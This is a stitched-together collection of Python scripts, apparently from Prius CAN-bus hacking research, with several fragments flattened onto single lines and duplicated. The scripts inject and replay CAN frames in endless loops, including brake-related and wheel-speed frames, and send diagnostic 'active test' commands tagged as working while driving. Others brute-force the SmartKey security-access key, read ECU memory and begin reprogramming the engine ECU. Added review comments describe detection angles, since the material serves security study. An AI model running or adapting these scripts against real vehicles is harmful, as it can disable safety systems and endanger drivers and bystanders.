from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) ECU = 0x7E0 #Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) #Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,37436) #f = open("can2-startup-min-drivers.dat", "r") f = open("can2-passenger.dat", "r") sff_lines = f.readlines() num_of_sffs = len(sff_lines) SFFArray = SFFMessage * num_of_sffs sffs = SFFArray() for i in range(0, num_of_sffs): ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i])) print "Starting to send msgs" #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) while(1): ## for i in range(0, 30): ## ecom.mydll.write_message(ecom.handle, sff_0024_F9) ## ## for i in range(0, 4): ## ecom.mydll.write_message(ecom.handle, sff_0344)
ecu_b1 = EcuBlock(0x00000000, 0xFF000000, 0x1000) ecu_b2 = EcuBlock(0xF7000100, 0xFF001000, None) blocks = [] blocks.append(ecu_b1) blocks.append(ecu_b2) #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: opens an ECOM device through the ecomcat_api wrapper and
# sends two requests to CAN ID 0x781, three seconds apart. Both payloads start
# with 0x30 (inputOutputControlByLocalIdentifier in ISO 14230) and differ only
# in the last byte.
# NOTE(review): no diagnostic-session or security-access step precedes the
# requests, and the return values are discarded, so a request the ECU rejects
# looks the same as one it accepts. Whether the ECU gates this service on
# session or vehicle state cannot be told from this script.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 37440)
    #ecom.open_device(1,0)

    ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    time.sleep(3)
    ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02])

    # Disabled experiments kept by the author (reading a frame back, replaying
    # capture files).
    #read one message (should contain payload of: 0x08)
    #sff = pointer(SFFMessage())
    #ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
    #ret = ecom.send_iso_tp_data(0x781, [0x3E])
    #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
    #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
    #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
arr.append((dword >> 16) & 0xFF) arr.append((dword >> 24) & 0xFF) return arr class EcuPart: def __init__(self, address, write_address, length): self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i)
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: parses one CAN frame from a debug-format text line, then
# modifies and retransmits it in an endless loop with no delay between writes.
# NOTE(review): the only integrity field touched here is the checksum, which
# the sender recomputes itself, so it gives the receiver no assurance about
# who sent the frame. A bus monitor could key on the transmit rate for this
# ID -- TODO confirm the legitimate sender's period.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 37440)

    #Changed data[3] (0x80) to 0x40 if you want beeping
    SFFLINE = "IDH: 02, IDL: E4, Len: 05, Data: 80 05 00 80 F0"

    # One-element ctypes array of SFFMessage, filled in by the DLL's parser.
    SFFArray = SFFMessage * 1
    SFFS = SFFArray()
    ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))

    while (1):
        # `&` is evaluated before `+=`, so this is `+= (1 & 0xFF)`, i.e. `+= 1`;
        # the mask is not applied to the stored byte.
        SFFS[0].data[0] += 1 & 0xFF
        # Force the top bit of data[0] on after the increment.
        SFFS[0].data[0] |= 0x80
        # Presumably recomputes the frame checksum after data[0] changed.
        ecom.mydll.FixChecksum(pointer(SFFS[0]))
        #ecom.mydll.PrintSFF(pointer(SFFS[0]), 0)
        ecom.mydll.write_message(ecom.handle, pointer(SFFS[0]))
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: loads CAN frames from "regular.dat" (one debug-format
# line per frame), converts them to SFFMessage structures, and replays the
# whole set in an endless loop.
# NOTE(review): the frames are sent exactly as captured, with no delay visible
# between writes; a replay like this is indistinguishable by content from the
# original traffic, so detection has to rely on timing or rate per CAN ID.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 35916)

    LOOPER = 0  # not used in the visible code

    # The file handle is never closed in the visible code.
    f = open("regular.dat", "r")
    sff_lines = f.readlines()
    num_of_sffs = len(sff_lines)

    # ctypes array type sized to the number of lines read.
    SFFArray = SFFMessage * num_of_sffs
    sffs = SFFArray()

    # Parse each text line into the matching array slot via the DLL.
    for i in range(0, num_of_sffs):
        ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i]))

    print "Starting to send wheel msgs"

    while (1):
        for i in range(0, num_of_sffs):
            ecom.mydll.write_message(ecom.handle, pointer(sffs[i]))
from PyEcom import *
from config import *

# Script entry point: asks every ECU listed in PriusECU, and every sub-ECU
# listed in PriusMainECU (reached through CAN ID 0x750), to start a diagnostic
# session, and prints whether each request succeeded.
# PriusECU, PriusMainECU and PriusDiagCode come from the star imports above;
# their contents are not visible here.
if __name__ == "__main__":
    print "[*] Starting Prius diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(0,1)

    # Request payload: service byte 0x10 followed by the configured session code.
    diag_req = [0x10, PriusDiagCode]

    # ECUs addressed directly by their own CAN ID.
    for ecu_num, ecu_str in PriusECU.iteritems():
        print "DaigCheck...[0x%04X] => %s..." % (ecu_num, ecu_str)
        ret = ecom.diagnostic_session(ecu_num, diag_req)
        if(not ret):
            print "FAILED\n"
        else:
            print "SUCCEEDED!\n"

    # ECUs behind 0x750, selected by the extra sub-address argument.
    for ecu_sub_num, ecu_str in PriusMainECU.iteritems():
        print "DiagCheck...[0x0750:0x%02X] => %s..." % (ecu_sub_num, ecu_str)
        ret = ecom.diagnostic_session(0x750, diag_req, ecu_sub_num)
        if(not ret):
            print "FAILED\n"
        else:
            print "SUCCEEDED!\n"
from PyEcom import *
from config import *
import time, struct

# Script entry point: a scratch file of diagnostic "active test" requests.
# Every request is commented out, so the visible part only opens the device.
# NOTE(review): the "[driving]" tags presumably mark tests that were accepted
# while the vehicle was moving -- TODO confirm. None of the listed requests is
# preceded by a session or security-access step.
if __name__ == "__main__":
    #print "[*] Starting diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)

    #It looks like all commands for 'active tests' use the 0x30
    #service which is 'inputOutputControlByLocalIdentifier' (see ISO 14230/14229)

    ## Clear DTC codes for all ECUs
    ## for ecu_num, ecu_name in PriusECU.iteritems():
    ##     ecom.send_iso_tp_data(ecu_num, [0x04])
    ##     ecom.send_iso_tp_data(ecu_num, [0x14])
    ## for ecu_sub_num, ecu_name in PriusMainECU.iteritems():
    ##     ecom.send_iso_tp_data(0x750, [0x04], ecu_sub_num)

    #Clear steering abnormalities history
    #ecom.send_iso_tp_data(0x7A1, [0xA6, 0x00])

    #Clear ABS history
    #ecom.send_iso_tp_data(0x7B0, [0xA6, 0x00])

    #AC Turn blower on 00-1F (00-31 decimal) [driving]
    #ecom.send_iso_tp_data(0x7C4, [0x30, 0x02, 0x00, 0x1F])

    #Combo Meter Fuel Empty + beep [driving]
    #ecom.send_iso_tp_data(0x7C0, [0x30, 0x03, 0x00, 0x01])
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(0, 1) ECU = 0x7E0 # Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) # Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) # ???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) # Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) # Unsure but this happens 3x in the capture before diag programming mode # I think this may have to do w/ tellin other ECUs the one being reprogrammed # is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: runs a SecurityAccess exchange (service 0x27) against one
# ECU eleven times, answering each seed with an all-zero key, and prints the
# negative-response reason the ECU returns.
# NOTE(review): presumably this observes how the ECU reacts to repeated wrong
# keys. ISO 14229 defines negative response codes for that case (0x35
# invalidKey, 0x36 exceededNumberOfAttempts, 0x37 requiredTimeDelayNotExpired);
# an ECU that only ever answers 0x35 is not enforcing an attempt limit.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)

    #Engine ECU
    ECU = 0x7E0

    for i in range(0, 11):
        print "Attempt %d" % (i)
        # Seed request; the payload comes from the wrapper's per-ECU helper.
        resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None)

        if not resp or len(resp) == 0:
            print "No Response"
        # NOTE(review): execution continues past the message above, so the
        # indexing below raises when resp is None or empty.

        # Reply bytes 2..5 combined most-significant-first into one integer.
        # The value is not used again in the visible code.
        seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5]

        #obviously incorrect
        key = [0,0,0,0]

        # Key submission: 0x27 0x02 followed by the four key bytes.
        key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]]
        key_resp = ecom.send_iso_tp_data(ECU, key_data, None)
        err = ecom.get_error(key_resp)
        if err != 0x00:
            print "Error: %s" % (NegRespErrStr(err))
#Client CAN ID which will be sending data/requests CID = 0x0001 #Server CAN ID which will be receiving data/requests SID = 0x0002 #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
from PyEcom import *
from config import *

# Script entry point: asks every ECU listed in PriusECU, and every sub-ECU
# listed in PriusMainECU (reached through CAN ID 0x750), to start a diagnostic
# session, and prints whether each request succeeded.
# PriusECU, PriusMainECU and PriusDiagCode come from the star imports above;
# their contents are not visible here.
if __name__ == "__main__":
    print "[*] Starting Prius diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(0, 1)

    # Request payload: service byte 0x10 followed by the configured session code.
    diag_req = [0x10, PriusDiagCode]

    # ECUs addressed directly by their own CAN ID.
    for ecu_num, ecu_str in PriusECU.iteritems():
        print "DaigCheck...[0x%04X] => %s..." % (ecu_num, ecu_str)
        ret = ecom.diagnostic_session(ecu_num, diag_req)
        if (not ret):
            print "FAILED\n"
        else:
            print "SUCCEEDED!\n"

    # ECUs behind 0x750, selected by the extra sub-address argument.
    for ecu_sub_num, ecu_str in PriusMainECU.iteritems():
        print "DiagCheck...[0x0750:0x%02X] => %s..." % (ecu_sub_num, ecu_str)
        ret = ecom.diagnostic_session(0x750, diag_req, ecu_sub_num)
        if (not ret):
            print "FAILED\n"
        else:
            print "SUCCEEDED!\n"
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0, 0, 0, 0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00:
from PyEcom import *
from config import *
import time, struct

# Script entry point: performs security access on one ECU, then issues a series
# of upload and memory-read requests for a single unit at address 0x0000F000,
# varying one argument between calls.
# NOTE(review): the varying argument (0x44, 0x33, 0x24, ...) is presumably the
# address/length format byte of the request -- confirm against the PyEcom
# wrapper. `ret` is overwritten by every call and never inspected, so the
# script itself does not show which variants the ECU accepts.
if __name__ == "__main__":
    #print "[*] Starting diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 35916)

    #Engine
    #ECU = 0x7E0

    #Hybrid/Power Management
    #ECU = 0x7E2

    #ABS
    ECU = 0x7B0

    # The result is not checked; the requests below are sent either way.
    ret = ecom.security_access(ECU)

    # Upload requests through the ISO 14229-style helper.
    ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001)

    # Same request through the ISO 14230-style helper, which takes no format byte.
    ret = ecom.request_upload_14230(ECU, 0x01, 0x0000F000, 0x00000001)

    # Memory reads of the same address and size.
    ret = ecom.read_memory_14229(ECU, 0x44, 0x0000F000, 0x00000001)
    ret = ecom.read_memory_14229(ECU, 0x24, 0x0000F000, 0x00000001)
    ret = ecom.read_memory_14229(ECU, 0x33, 0x0000F000, 0x00000001)
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: parses one CAN frame from a debug-format text line, then
# modifies and retransmits it in an endless loop, pausing about a millisecond
# between writes.
# NOTE(review): the variable names suggest the frame relates to braking; the
# script itself does not establish what the receiver does with it. The frame
# carries no sender authentication, only a checksum that is recomputed here.
# The roughly 1 kHz transmit rate is something a bus monitor could key on --
# TODO confirm the legitimate period for this ID.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,37440)

    brake_sff_str = "IDH: 02, IDL: 83, Len: 07, Data: 61 00 E0 BE 8C 00 17"
    brake_sff = SFFMessage()
    ecom.mydll.DbgLineToSFF(brake_sff_str, pointer(brake_sff))

    print "Starting to send msgs"

    while(1):
        # `&` is evaluated before `+=`, so this is `+= (1 & 0x7F)`, i.e. `+= 1`;
        # the 0x7F mask is not applied to the stored byte.
        brake_sff.data[0] += 1 & 0x7F
        # Presumably recomputes the frame checksum after data[0] changed.
        ecom.mydll.FixChecksum(pointer(brake_sff))
        #ecom.mydll.PrintSFF(pointer(brake_sff), 0)
        ecom.mydll.write_message(ecom.handle, pointer(brake_sff))
        time.sleep(.001)
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: loads CAN frames from "wheel.dat" (one debug-format line
# per frame), converts them to SFFMessage structures, and replays the whole set
# in an endless loop with a one-millisecond pause after each frame.
# NOTE(review): the frames are sent exactly as captured; a replay like this is
# indistinguishable by content from the original traffic, so detection has to
# rely on timing or rate per CAN ID.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)

    LOOPER = 0  # not used in the visible code

    # The file handle is never closed in the visible code.
    f = open("wheel.dat", "r")
    sff_lines = f.readlines()
    num_of_sffs = len(sff_lines)

    # ctypes array type sized to the number of lines read.
    SFFArray = SFFMessage * num_of_sffs
    sffs = SFFArray()

    # Parse each text line into the matching array slot via the DLL.
    for i in range(0, num_of_sffs):
        ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i]))

    print "Starting to send wheel msgs"

    while(1):
        for i in range(0, num_of_sffs):
            ecom.mydll.write_message(ecom.handle, pointer(sffs[i]))
            time.sleep(.001)
ecu_b1 = EcuBlock(0x00000000, 0xFF000000, 0x1000) ecu_b2 = EcuBlock(0xF7000100, 0xFF001000, None) blocks = [] blocks.append(ecu_b1) blocks.append(ecu_b2) #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: opens an ECOM device through the ecomcat_api wrapper and
# sends two requests to CAN ID 0x781, three seconds apart. Both payloads start
# with 0x30 (inputOutputControlByLocalIdentifier in ISO 14230) and differ only
# in the last byte.
# NOTE(review): no diagnostic-session or security-access step precedes the
# requests, and the return values are discarded, so a request the ECU rejects
# looks the same as one it accepts. Whether the ECU gates this service on
# session or vehicle state cannot be told from this script.
if __name__ == "__main__":
    ecom = PyEcom("Debug\\ecomcat_api")
    ecom.open_device(1, 37440)
    # ecom.open_device(1,0)

    ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    time.sleep(3)
    ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02])

    # Disabled experiments kept by the author (reading a frame back, replaying
    # capture files).
    # read one message (should contain payload of: 0x08)
    # sff = pointer(SFFMessage())
    # ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
    # ret = ecom.send_iso_tp_data(0x781, [0x3E])
    # ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
    # ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
    # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
from PyEcom import *
from config import *
import time, struct

# Script entry point: performs security access on one ECU, then issues a series
# of upload and memory-read requests for a single unit at address 0x0000F000,
# varying one argument between calls.
# NOTE(review): the varying argument (0x44, 0x33, 0x24, ...) is presumably the
# address/length format byte of the request -- confirm against the PyEcom
# wrapper. `ret` is overwritten by every call and never inspected, so the
# script itself does not show which variants the ECU accepts.
if __name__ == "__main__":
    #print "[*] Starting diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)

    #Engine
    #ECU = 0x7E0

    #Hybrid/Power Management
    #ECU = 0x7E2

    #ABS
    ECU = 0x7B0

    # The result is not checked; the requests below are sent either way.
    ret = ecom.security_access(ECU)

    # Upload requests through the ISO 14229-style helper.
    ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001)
    ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001)

    # Same request through the ISO 14230-style helper, which takes no format byte.
    ret = ecom.request_upload_14230(ECU, 0x01, 0x0000F000, 0x00000001)

    # Memory reads of the same address and size.
    ret = ecom.read_memory_14229(ECU, 0x44, 0x0000F000, 0x00000001)
    ret = ecom.read_memory_14229(ECU, 0x24, 0x0000F000, 0x00000001)
    ret = ecom.read_memory_14229(ECU, 0x33, 0x0000F000, 0x00000001)
from PyEcom import *
from config import *
from ctypes import *
import time, struct

# Script entry point: opens the device and sends the same 0x30-prefixed
# diagnostic request to CAN ID 0x7C0 in an endless loop, with no delay and no
# check of the reply.
# A raw frame is also parsed from SFFLINE, but the code that would modify and
# use it is commented out, so in the visible code it is never transmitted.
# NOTE(review): no session or security-access step precedes the request;
# whether the ECU gates this service on vehicle state cannot be told from here.
if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,37440)

    LOOPER = 0     # not used in the visible code
    SETSPEED = 62  # only referenced by the commented-out block below

    SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00"

    # One-element ctypes array of SFFMessage, filled in by the DLL's parser.
    SFFArray = SFFMessage * 1
    SFFS = SFFArray()
    ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))

    #if(SETSPEED < 200):
    #    SETSPEED = SETSPEED * 161

    #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF;
    #SFFS[0].data[1] = SETSPEED & 0xFF;
    #ecom.mydll.FixChecksum(pointer(SFFS[0]))

    while(1):
        ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
#Client CAN ID which will be sending data/requests CID = 0x0001 #Server CAN ID which will be receiving data/requests SID = 0x0002 #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
from PyEcom import *
from config import *
import time, struct, sys

# Script entry point: the opening steps of a reprogramming sequence against one
# ECU -- security access, a request repeated three times to CAN ID 0x720, then
# a switch to diagnostic session 0x02. The script exits with status 1 as soon
# as security access or the session change fails.
if __name__ == "__main__":
    #print "[*] Starting diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1,35916)

    ECU = 0x7E0

    #do security access
    ret = ecom.security_access(ECU)
    if ret == False:
        print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
        sys.exit(1)

    print "[*] [0x%04X] Security Access: Success" % (ECU)

    # Unsure, but this happens 3x in the capture before diag programming mode.
    # It may tell the other ECUs that the one being reprogrammed is going
    # offline for a while, so that they do NOT set DTC codes.
    # The return value of these three requests is not checked.
    for i in range(0, 3):
        ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27])

    # Requires the vehicle to be in the half-on state (power on, engine off).
    # Failure to be in the required mode will result in the diagnostic session failing.
    ret = ecom.diagnostic_session(ECU, [0x10, 0x02])
    if ret == False:
        print "[!] [0x%04X] Programming Mode: Failure" % (ECU)
        sys.exit(1)
arr.append(dword & 0xFF) arr.append((dword >> 8) & 0xFF) arr.append((dword >> 16) & 0xFF) arr.append((dword >> 24) & 0xFF) return arr class EcuPart: def __init__(self, address, write_address, length): self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i)